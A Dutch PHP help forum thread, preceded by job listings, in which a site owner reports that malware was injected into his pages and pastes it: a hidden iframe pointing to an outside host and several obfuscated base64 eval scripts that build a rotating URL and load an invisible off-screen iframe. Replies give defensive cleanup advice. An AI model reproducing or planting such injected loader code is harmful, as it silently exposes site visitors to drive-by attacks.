Hackers?

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Software ontwikkelaar ASP .Net / C#

Functie omschrijving Gezocht! Software ontwikkelaar. Ben jij bekend met termen als ASP .Net, C# en SQL? Ben jij op zoek naar een afwisselende en uitdagende IT-functie binnen de agrarische sector? En omschrijf jij jezelf als zelfstandig, enthousiast en proactief? Dan hebben wij de perfecte functie voor jou! Als Software ontwikkelaar binnen deze organisatie ben je samen met één andere collega verantwoordelijk voor de ontwikkeling en modificatie van het support en controle programma dat binnen dit bedrijf gebruikt wordt. Je gaat hierbij bijdragen aan de vertaling van klantwensen naar effectieve softwareoplossingen. Verder bestaan je werkzaamheden uit: Technische uitwerking van de business

Bekijk vacature »

VB.NET developer

Functie Het development team waar jij in terecht komt bestaat uit twee ervaren software developers. De directeur/eigenaar is tevens één van deze developers. Jij werkt direct samen met jouw werkgever en kan dan ook veel kennis en ervaring bij dit bedrijf op doen. Als team zijn jullie verantwoordelijk voor de kantoorapplicatie die deze organisatie aanbied in een niche markt. Het team is op dit moment actief bezig met een migratie waarbij het eindstation eindigt in een C# .NET omgeving. Echter is een deel van de software al geschreven in C# .NET. Hierbij is gebruik gemaakt van C# .NET, CSS, HTML,

Bekijk vacature »

Front-end Developer

Dit ga je doen Het onderhouden, ontwikkelen en testen van front-end software van diverse klant- en medewerkersapplicaties; Het ontwikkelen van maatwerk front-end oplossingen in Vue.js en participeren in een scrumteam; Mede-verantwoordelijk voor het begeleiden en coachen van drie junior front-end developers; Verantwoordelijk voor code-reviews en het opstellen van de juiste documentatie zoals userstories en API ontwerp; Participeren in diverse projecten t.b.v. optimalisatie van diverse applicaties; Het opzetten van API koppelingen met externe applicaties. Hier ga je werken Betreffende organisatie is gevestigd in de regio van Swifterbant en is al ruim 20 jaar lang bedreven in het ontwikkelen en aanbieden van

Bekijk vacature »

Fullstack developer

Functie omschrijving Ben jij toe aan een nieuwe uitdaging en zou jij graag bij een platte maar informele organisatie werken? Voor een mooi softwarebedrijf in omgeving Alblasserdam zijn wij op zoek naar versterking op de afdeling Software Development! Als Fullstack react.js developer wordt je bij dit bedrijf onderdeel van de volledige ontwikkeling van requirement tot oplevering! Jouw focus ligt op de front end en alles wat daarbij komt kijken. Je gaat ontwerpen, ontwikkelen, testen en valideren. Je zult voornamelijk werken met React.js en Typescript. Maar ook Javascript, HTML en CSS komen aanbod. Daarnaast zal je ook regelmatig met de back

Bekijk vacature »

Back-end programmeur

Functieomschrijving Heb jij kort geleden je MBO of HBO ICT in ontvangst mogen nemen? Of ben je klaar voor een nieuw hoofdstuk in jouw carrière? Voor een uitdagende werkgever in de regio van Tilburg zijn wij op zoek naar een ambitieuze back-end programmeur met affiniteit met MS Acess. Samen met een enthousiast team ben je verantwoordelijk voor het bouwen van maatwerk software voor hun klanten. Je hebt kennis of ervaring van SQL, Maar affiniteit met MS Acess is nog belangrijker. Je bent sociaal naar klanten en flexibel ingesteld. Je denkt altijd in kansen en gaat graag de uitdaging aan. Verder

Bekijk vacature »

Back-end Developer

Functieomschrijving Heb jij kort geleden je HBO ICT Informatica diploma in ontvangst mogen nemen? Of heb je een aantal jaar ervaring als Software Developer en ben je klaar voor een nieuw hoofdstuk in jouw carrière? Voor een gewaardeerde werkgever in de regio van Goirle zijn wij op zoek naar een junior/medior Back-end Developer met affiniteit met MS Acess. Samen met een vooruitstrevend team ben je verantwoordelijk voor het ontwikkelen van maatwerk software voor hun klanten. Je hebt kennis of ervaring van SQL en affiniteit met MS Acess. Je bent klantvriendelijk en flexibel ingesteld en vindt het leuk om klanten te

Bekijk vacature »

Junior PHP Developer

Functieomschrijving Junior PHP Developer gezocht! Voor een opdrachtgever in de regio Gelderland zijn wij op zoek naar een Junior PHP Developer die onderdeel gaat worden van het ontwikkelingsteam van deze organisatie. In deze functie ga jij aan de slag met het schrijven van software voor de aansturing van en het managen van windparken en bijbehorende onderdelen. Hiernaast ga jij je bezighouden met het ontwikkelen, testen en onderhouden van diverse webapplicaties. Het team waarin je komt te werken bestaat uit 3 developers, hierdoor krijg je veel verantwoordelijkheid en de kans om jezelf verder te ontwikkelen. Er wordt echter wel van je

Bekijk vacature »

Embedded Software Developer Games

Functie omschrijving Heb jij affiniteit met hardware en wil jij kleuren binnen een Qt framework? Spreek jij de talen C en of C ++? Dan ben ik wellicht opzoek naar jou! Voor een super gave opdrachtgever in omgeving Delft is er namelijk plek voor een nieuwe kracht! Dit bedrijf is gespecialiseerd in het ontwerpen van software voor een unieke game industrie. Wil jij betrokken worden bij een proces dat loopt van ontwikkeling tot installatie? Waarbij je bezig zult zijn met perfecte systemen die geleverd worden aan binnen en buitenland? Je zult in een team, samen met vier ontwikkelaars, de mooiste

Bekijk vacature »

Front-end developer (Vue.js) gezocht!

Functie Als Front-end developer is het jouw doel om efficiënte en effectieve frontend code te ontwerpen, ontwikkelen en onderhouden die goed aansluit bij de functionele behoefte vanuit de klant. Je zorgt voor optimale SEO-resultaten, sitespeed en frontend security. You build it, you run it, you own it! Je maakt deel uit van een DevOps Scrum team en werkt samen met back-end developers, test-engineers, interaction designers en een projectmanager. Er zijn verschillende groepen Scrum teams. Een roadmap team is jouw ‘’thuisbasis’’, daar wordt gewerkt aan doorontwikkeling van bestaande omgevingen voor een aantal klanten. Hiernaast zijn er projectteams waar nieuwe omgevingen worden

Bekijk vacature »

Freelance Fullstack Java Developer

Functieomschrijving Voor een opdrachtgever in omgeving Rotterdam zijn wij op zoek naar ervaren Fullstack JAVA Developers die graag op projectbasis willen werken. Je komt terecht bij een informele developers club die mooie projecten uitvoeren voor grote klanten. Ben je een ervaren freelancer of werk je in loondienst en ben je toe aan een nieuwe uitdaging? Lees dan snel verder want wie weet is dit een leuke vacature voor jou! Het fijne van deze werkgever is dat je zelf mag beslissen hoe je te werk wilt gaan. Wil je als freelancer werken dan is dat OK. Wil je de zekerheid hebben

Bekijk vacature »

Fullstack developer

Functie omschrijving We are looking for a dutch native speaker Wil jij werken als Senior Developer en werken aan een applicatie die duizenden marketingcampagnes automatisch aanstuurt? Dit is je kans! Kom werken voor onze opdrachtgever en in deze rol zul je veel vrijheid en verantwoordelijkheid krijgen om gezamenlijk de applicatie naar een hoger plan te tillen. Wat ga je verder doen: Optimaliseren, beheren en uitbreiden van onze applicatie; Het bouwen van aansluitingen op de systemen van partners middels API’s; Meedenken over de technische/ontwikkel-standaarden; Proactief verbeterpunten voorstellen. Bedrijfsprofiel Het is een organisatie die met een team van verschillende developers én marketeers

Bekijk vacature »

Full stack Python developer

Functie Samen met andere collega’s (een product owner, een software manager en een ervaren ontwikkelaar) ga jij onze producten verder ontwikkelen. Jouw verantwoordelijkheden zullen bestaan uit: – Verder wil gaan met de ontwikkeling van onze bestaande producten; nieuwe features! – Meedenkt over de roadmap van onze producten – Als sparringpartner kan optreden op het gebied van development – Zelf ook nieuwe ideeën op tafel durft te leggen en deze van scratch af aan wilt bouwen Hieronder ook een paar voorbeelden van projecten waar we momenteel mee bezig zijn of binnenkort aan willen beginnen: – Real-time interactie creëren in onze web

Bekijk vacature »

Database developer - SQL

Functie omschrijving Kan jij goed overweg met complexe algoritmes en het schrijven van procedures in T-SQL? Heb jij al wat ervaring opgedaan met SQL en vind je het tijd voor de volgende stap? Lees dan snel verder! Dit software bedrijf, gespecialiseerd in de ontwikkeling van logistieke software, is op zoek naar een ervaren SQL database developer. Jouw werkzaamheden zullen onder andere bestaan uit: Je sluit aan bij meetings en brengt het gehele logistieke proces in kaart. Vervolgens ga je als lead developer aan de slag om de klus te klaren. Je stuurt het junior developer team en helpt, zo nodig,

Bekijk vacature »

Junior .NET Software Developer

Dit ga je doen Software development met behulp van C# .NET en / of PHP, je mag zelf kiezen waar jij je in wil specialiseren Meedenken over het nieuwe pakket, waar moet het aan voldoen? Unit-, integratie- en diverse andere tests schrijven en uitvoeren Nauw samenwerken met je IT collega's zoals Testers, Developers, DevOps Specialisten en Architecten Jezelf ontwikkelen met behulp van trainingen en cursussen Hier ga je werken Onze klant, een grote speler in de medische sector, is op zoek naar een enthousiaste junior (of meer ervaren) Software Developer die klaar is voor een nieuwe stap in zijn of

Bekijk vacature »

Fullstack Software Developer

Functieomschrijving Voor een ambitieuze werkgever in regio Roosendaal zijn wij op zoek naar een Full Stack C#.NET Developer. Als software programmeur ben je verantwoordelijk voor het bouwen van webapplicaties, apps en dashboards voor de eigen IOT-oplossingen. Je werkt samen met andere developers en engineers om de sensoren in machines uit te lezen en deze data om te zetten in management informatie voor jullie klanten. Taken en verantwoordelijkheden: Verder ontwikkelen en onderhouden van webapplicaties, dashboards en apps voor de eigen IOT-oplossingen; Testen en goedkeuren van de software; Je gaat aan de slag met de volgende technologieën en frameworks: C#, JS frameworks,

Bekijk vacature »
Olivier Peeters

Olivier Peeters

04/11/2012 13:43:11
Quote Anchor link
Hallo allen,

ik heb een probleem! Blijkbaar is er, op onverklaarbare wijze, op al mijn pagina's deze code toegevoegd =>
"<iframe style="visibility: hidden; display: none; display: none;" src="http://djerseen.com/referer.php?id={A8D99C2D-8615-4C21-AB70-EE2DF83F6905}"></iframe>"


"<script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}returnt;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyIHVybD0iaHR0cDovLyI7DQpmb3IgKGk9MDtpPGVuYy5sZW5ndGg7aSsrKSB1cmwrPWtleXNzLnN1YnN0cigoYWgqZW5jW2ldKSAlIDMxLDEpOw0KdXJsKz0iLm9yZy90cy9nby5waHAcT0xIjsNCmZmZj0iZnJhbSI7DQppZiAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2JvZHknKVswXSkgeyBpZnJhbWVyKCk7fSBlbHNlIHsNCmRvY3VtZW50LndyaXRlKCI8aSIrZmZmKyJlIHNyYz0nIit1cmwrIicgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZ
ik7DQp9')));</script><script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}
('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyIHVybD0iaHR0cDovLyI7DQpmb3IgKGk9MDtpPGVuYy5sZW5ndGg7aSsrKSB1cmwrPWtleXNzLnN1YnN0cigoYWgqZW5jW2ldKSAlIDMxLDEpOw0KdXJsKz0iLm9yZy90cy9nby5waHAcT0xIjsNCmZmZj0iZnJhbSI7DQppZiAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2JvZHknKVswXSkgeyBpZnJhbWVyKCk7fSBlbHNlIHsNCmRvY3VtZW50LndyaXRlKCI8aSIrZmZmKyJlIHNyYz0nIit1cmwrIicgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZ
ik7DQp9')));</script><script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|
(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}
('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDM
/* Ik heb hier een heel deel weggeknipt, want dit gaat nog paginalang door ;-) Tot de laatste regel */
</script>"

Deze code blijkt dus malware te zijn, welke op onverklaarbaze wijze op mijn website gepost is..

Belangrijk is dat ik dit heb op mijn eigen website (gehost op 3owl), en dat ik deze enkel gemaakt heb dmv PHP-pagina's (dus geen CMS) & Filezilla (overzetten op server). Verder zit er voor het gastenboek een 1 MySQL database op mijn pagina. Deze code is ingesloten in mijn pagina's die zichtbaar zijn in het scherm (dus ge-include pagina's hebben deze code niet)...

Door deze code is mijn site gelocaliseerd als aanvalssite, waardoor deze onbereikbaar is. Link van mijn website is -> http://oli4tje.3owl.com/

Hoe komt het dat ik een hacker heb, wat valt hieraan te doen & hoe in de toekomst vermijden?
Vooral, als alles opgelost is (heb nu wel al alle code verwijderd), hoe zorg ik ervoor dat de melding van aanvalsite terug verwijderd word (& dus terug op een normale manier bezocht kan worden?

Alvast bedankt voor jullie raad/hulp. Want ik snap niet hoe dit kan...

Vriendelijke groeten
 
PHP hulp

PHP hulp

27/07/2024 04:16:51
 
Frank Nietbelangrijk

Frank Nietbelangrijk

04/11/2012 14:11:35
Quote Anchor link
Om de site weer open te stellen lijkt het me handig dat je contact opneemt met je provider. Ik zie dat het een gratis host is? Dus ja daar kunnen we niet al te veel van verwachten. Wat bedoel je precies met ... aan mijn pagina's toegevoegd? Welke bestanden dat willen we weten: PHP HTML? of stond de code in je database?
In ieder geval geldt nu dat je al je wachtwoorden moet veranderen en dat je heel kritisch moet gaan kijken naar alle input van buiten af: dus alle <FORM>'s. de waarden worden - waarschijnlijk met PHP- uitgelezen. Die waarden moet je controleren op alles dat maar mogelijk is en escapen zie
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
<?php
$string
=  mysql_real_escape_string ($string); ?>


Heb je ook een file upload in één of meerdere formulieren? zorg dan dat er nooit geen extensies als PHP e.d. geupload kunnen worden. Je moet dit controleren niet aan de hand van een blacklist maar aan de hand van een whitelist, dus alleen extensies doorlaten die jij goedkeurt
 
Reshad F

Reshad F

04/11/2012 14:12:21
Quote Anchor link
ik denk een FTP lek, wachtwoorden veranderen en bij google developer tools een aanvraag doen voor een rescan of hoe het ook heet.. ( ben het ff kwijt ) maar het is niet te missen als je op de pagina bent. ( binnen ongeveer 2 uur meestal ) zou het probleem opgelost moeten zijn. en anders moet je wachten kan een paar uur duren of een week.. maar als google merkt dat het gevaar weg is dan wordt de melding weggehaald :)
 
Ceasar Feijen

Ceasar Feijen

04/11/2012 14:46:41
Quote Anchor link
Misschien ook je gastenboek even checken. Je kunt nu gewoon op submit drukken en voila
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.